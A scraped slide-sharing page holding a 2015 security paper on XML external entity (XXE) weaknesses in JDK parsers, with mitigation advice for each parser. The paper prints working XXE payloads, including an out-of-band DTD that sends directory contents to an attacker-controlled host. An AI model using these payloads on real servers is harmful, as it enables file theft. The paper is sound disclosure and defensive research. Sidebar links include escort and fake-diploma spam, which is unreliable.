New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
Drupal 8 meets to symphony
Drupal 8 meets to symphonyDrupal 8 meets to symphony
Drupal 8 meets to symphony
 
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLEDATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients
 
XML notes.pptx
XML notes.pptxXML notes.pptx
XML notes.pptx
 
Breakfast cereal for advanced beginners
Breakfast cereal for advanced beginnersBreakfast cereal for advanced beginners
Breakfast cereal for advanced beginners
 
XML parsing using jaxb
XML parsing using jaxbXML parsing using jaxb
XML parsing using jaxb
 
MS SQL server audit
MS SQL server auditMS SQL server audit
MS SQL server audit
 

Plus de Moabi.com

[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用
[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用
[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用Moabi.com
 
[Hackito2012] Hardware backdooring is practical
[Hackito2012] Hardware backdooring is practical[Hackito2012] Hardware backdooring is practical
[Hackito2012] Hardware backdooring is practicalMoabi.com
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...Moabi.com
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory AnalysisMoabi.com
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory AnalysisMoabi.com
 
[h2hc] Generic exploitation of invalid memory writes
[h2hc] Generic exploitation of invalid memory writes[h2hc] Generic exploitation of invalid memory writes
[h2hc] Generic exploitation of invalid memory writesMoabi.com
 
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 modeMoabi.com
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 

Plus de Moabi.com (9)

[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用
[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用
[2013 syscan360] Jonathan Brossard_katsuni理论介绍以及在沙盒和软件仿真方面的应用
 
[Hackito2012] Hardware backdooring is practical
[Hackito2012] Hardware backdooring is practical[Hackito2012] Hardware backdooring is practical
[Hackito2012] Hardware backdooring is practical
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis
 
[h2hc] Generic exploitation of invalid memory writes
[h2hc] Generic exploitation of invalid memory writes[h2hc] Generic exploitation of invalid memory writes
[h2hc] Generic exploitation of invalid memory writes
 
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode
[Ruxcon] Breaking virtualization by switching the cpu to virtual 8086 mode
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 

Dernier

Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 

Dernier (20)

Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 

[Blackhat2015] FileCry attack against Java

  • 1. XXE defence(les)s in JDK XML parsers Sergey Gorbaty sergey.gorbaty@salesforce.com Xiaoran Wang xiaoran.wang@salesforce.com Hormazd Billimoria hbillimoria@salesforce.com Jonathan Brossard jbrossard@salesforce.com Product Security, Salesforce.com, San Francisco, CA, USA Abstract. This article will demonstrate that many Oracle JDK XML parsers are vulnerable to Xml eXternal Entity (XXE) attack. We shall also demonstrate that existing Java defenses against XXE attacks fall short and fail to protect against malicious malformed XML, which re- sults in a parsing error with external entities successfully expanded. Our exploit has the capability of exfiltrating files and launching directory traversals. We present a proof of concept dumping filenames under /tmp directory from a remote server running JDK 7 via untrusted XML files. It is our hope to raise awareness of the industry regarding the dangers of XXE-type of attacks. This should also result in upgrading the best practices for disabling external entity resolution for several XML parsers. Keywords: Java, XXE, XML, parser.
  • 2. 1 Introduction In the present article we will provide an overview of the standard attack using XML external entities. In the following subsection we will describe the effects of specific malformed XML attack scenario for JDK7-based XML parsers, which was first introduced in [1]. In the later subsection we will introduce defences that are recommended by authoritative sources and demonstrate where they fall short. 1.1 Background XML DTD can be constructed from internal, external and parameter entities. External entities are references to other entities that can be found outside of the current document. When XML parser encounters an external entity URI, it expands the reference to include the content from the external link in the current document. An external entity may reference a file or a URL. <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> Fig. 1. Simple XXE payload 1.2 Introducing the Attack As it was alluded to in the previous section, the exception thrown by the XML parser may happen during various stages of parsing. JDK XML entity expander always assumes the external entity URL is well formed and will attempt to resolve it. Our first goal is to confirm that external entities are being resolved; therefore, we include an external URL in one entity. Our second goal is to create an entity pointing to an invalid URL, which is containing data resulted from expansion of another external en- tity. Such entity structure would force the XML parser to resolve some sensitive external entities first and then leak the resolved data using spe- cially crafted URL and finally throw an IOException. The IOException in this case is most often shadowed and thrown only after an attempt to resolve the entity URL at which point the attacker had already received the data via an attacker-controlled DNS resolver.
  • 3. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % payload SYSTEM "file:///etc"> <!ENTITY % dtd SYSTEM "http://externallyhostedentity.com/a.dtdâĂİ> %dtd; %release; ]><foo>business as usual</foo> Fig. 2. XXE with entity cross-references <!ENTITY % nested "<!ENTITY &#x25; release SYSTEM ’jar:%payload;.externallyhostedentity.com!/’>"> %nested; Fig. 3. Externally hosted a.dtd The main reason for having a separate a.dtd is that expanded references cannot be referenced in the same document. Figures 2 and 3 demonstrate how an attacker may learn if the parser is vulnerable to XXE by monitoring DNS resolver and/or http://externallyhostedentity. com HTTP logs. Furthermore, the XML parser may leak the directory content of /etc to the authoritative DNS resolver that holds A-type record for the attacker controlled http://externallyhostedentity.com. 2 Insufficient Recommendations Oracle JDK7 documentation contains plethora of information about XML parser configuration. One of the first options that come to developer’s mind is to enable FEATURE_SECURE_PROCESSING in order to pre- vent external connections. “When FEATURE_SECURE_PROCESSING is enabled it is recommended that implementations restrict external con- nections by default” [2], alas, despite Oracle’s recommendation XML parsers do not actually restrict external connections when FEATURE _SECURE_PROCESSING is enabled. When it comes to tackling XXE Oracle does not have explicit recommendations but for certain parsers it documents how to turn expansion of XML external entities off while other parses do not have a way to turn it off. OWASP recommendations [3] only cover major JDK parsers and respond to XXE threat by disabling of fetching external DTD altogether on most of them. Long et. all in [4] recommend creating a custom entity resolver for XMLReader but do not cover any others. [5] recommendations provide generic recommendations and only cover javax.xml.parsers.DocumentBuilderFactory specifics.
  • 4. In the following sections we will examine each major JDK XML parser provider and see what capabilities it provides for mitigating XXE. 2.1 javax.xml.stream.XMLInputFactory Using setProperty method on this [6] Oracle XML factory, developer can set javax.xml.stream.isSupportingExternalEntities property to false. Un- fortunately, as we discovered [7] setting this property was not properly functioning and resulted in a 0-day vulnerability, which was addressed in JDK update 7u67. OWASP recommendation [3] for this parser ignores useful needs for XML DTD and recommends disabling external DTD altogether, which cer- tainly fixes the problem but may not be in line with the business needs. 2.2 javax.xml.parsers.DocumentBuilderFactory OWASP recommendations disabling the DTD but also mentions that if one cannot completely block DTD, she should simply disable the follow- ing propertes: http://xml.org/sax/features/external-general-entities, http://xml.org/sax/features/external-parameter-entities. Unfortunately, the documentation does not explicitly tell that disabling both of the above properties is required. Disabling http://xml.org/sax/ features/external-general-entities on its own would have no effect against the attack mentioned earler. Morgan et. all [5] and OWASP recommendations appear to be very sim- ilar. Oracle documents [8] that setAttribute method in this factory can be used to set XMLConstants.ACCESS_EXTERNAL_DTD and XMLConstants. ACCESS_EXTERNAL_SCHEMA properties, which would allow a de- veloper to restrict protocols that can be used to fetch DTD or schema. The developer should be aware that jar:// protocol is quite dangerous and should be excluded as it can resolve files and externally hosted web- sites. 2.3 javax.xml.parsers.SAXParserFactory Oracle documentation [9] for this factory does not include any features that would help us disable external entities processing. OWASP includes recommendations that range from disabling DTD to disabling external entities only. The defenses listed by OWASP are similar to the ones out- lined in 2.2.
  • 5. 2.4 javax.xml.transform.sax.SAXTransformerFactory and javax.xml.transform.TransformerFactory Oracle provides in [10] information on how to disable protocols that can be used to fetch external DTD and external entities. Unfortunately, it is not possible to turn off external entities without disabling DTD using XMLConstants.ACCESS_EXTERNAL_DTD attribute. 2.5 javax.xml.validation.SchemaFactory and javax.xml.validation.Validator These particular parsers allow a developer to provide a custom external resource resolver using setResourceResolver method [11][12]. Unfortu- nately, the default parameter value of null does not result in a safe be- havior and is, essentially, a no-op. The developer must supply a proper resolver else the attack will succeed. An alternative and safe way to mitigate the attack is to utilize setProp- erty method [13][14] with XMLConstants. ACCESS_EXTERNAL_DTD as the first parameter and whitelisted protocols as the second. 2.6 javax.xml.bind.Unmarshaller and javax.xml.xpath.XPathExpression As Oracle documentation suggests there isn’t a way to modify behavior of Unmarshaller in terms of resolving external entities: “There currently are not any properties required to be supported by all JAXB Providers on Unmarshaller” [15]. XPathExpression simply does not expose any public method to set properties. The only option to make these two parsers safe available is to parse the XML first, using a different safe parser, and then pass the result in. E.g. for Unmarshaller a developer would need to produce a safe java.xml.transform.Source and pass it to the unmarshal method. And for XPathExpression a safely parsed org.xml.sax.InputSource needs to be passed to the evaluate(...) method [16]. 3 Conclusion Each JDK parser has a specific configuration when it comes to prevent- ing XXE attacks. It is important to configure the parser for handling incorrect input as well as the one that is correct but knowingly produces errors.
  • 6. References 1. Timur Yunusov, A.O.: Xml out-of-band data retrieval, BlackHat USA. https://media.blackhat.com/eu-13/briefings/Osipov/ bh-eu-13-XML-data-osipov-slides.pdf (2013) 2. Oracle: Property XMLConstants.ACCESS_EXTERNAL_DTD. (http://docs.oracle.com/javase/7/docs/api/javax/xml/ XMLConstants.html#ACCESS_EXTERNAL_DTD) 3. OWASP: Xml external entity (xxe) processing. (https: //www.owasp.org/index.php/XML_External_Entity_%28XXE% 29_Processing) 4. Fred Long, Dhruv Mohindra, R.C.D.F.D.S.: The CERT Oracle Se- cure Coding Standard for Java. Addison-Wesley (2012) 5. Timothy D. Morgan, O.A.I.: Xml schema, dtd, and entity attacks. http://vsecurity.com/download/papers/XMLDTDEntityAttacks. pdf (2014) 6. Oracle: Class xmlinputfactory. (http://docs.oracle.com/javase/ 7/docs/api/javax/xml/stream/XMLInputFactory.html) 7. Oracle: Oracle critical patch update advisory - october 2014. http://www.oracle.com/technetwork/topics/security/ cpuoct2014-1972960.html (2014) 8. Oracle: Function DocumentBuilderFactory.setAttribute(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ parsers/DocumentBuilderFactory.html#setAttribute(java. lang.String,%20java.lang.Object)) 9. Oracle: Function SAXParserFactory.setFeature(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/parsers/ SAXParserFactory.html#setFeature(java.lang.String, %20boolean)) 10. Oracle: Function TransformerFactory.setAttribute(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ transform/TransformerFactory.html#setAttribute(java.lang. String,%20java.lang.Object)) 11. Oracle: Function SchemaFactory.setResourceResolver(..). (http://docs.oracle.com/javase/7/docs/api/javax/xml/ validation/SchemaFactory.html#setResourceResolver(org. w3c.dom.ls.LSResourceResolver)) 12. Oracle: Function Validator.setResourceResolver(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/validation/ Validator.html#setResourceResolver(org.w3c.dom.ls. LSResourceResolver)) 13. Oracle: Function SchemaFactory.setProperty(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/validation/ SchemaFactory.html#setProperty(java.lang.String,%20java. lang.Object)) 14. Oracle: Function Validator.setProperty(..). (http://docs.oracle. com/javase/7/docs/api/javax/xml/validation/Validator. html#setProperty(java.lang.String,%20java.lang.Object)) 15. Oracle: Class Unmarshaller. (http://docs.oracle.com/javaee/7/ api/javax/xml/bind/Unmarshaller.html#supportedProps)
  • 7. 16. Oracle: Function XPathExpression.evaluate(..). (http: //docs.oracle.com/javase/7/docs/api/javax/xml/xpath/ XPathExpression.html#evaluate(org.xml.sax.InputSource))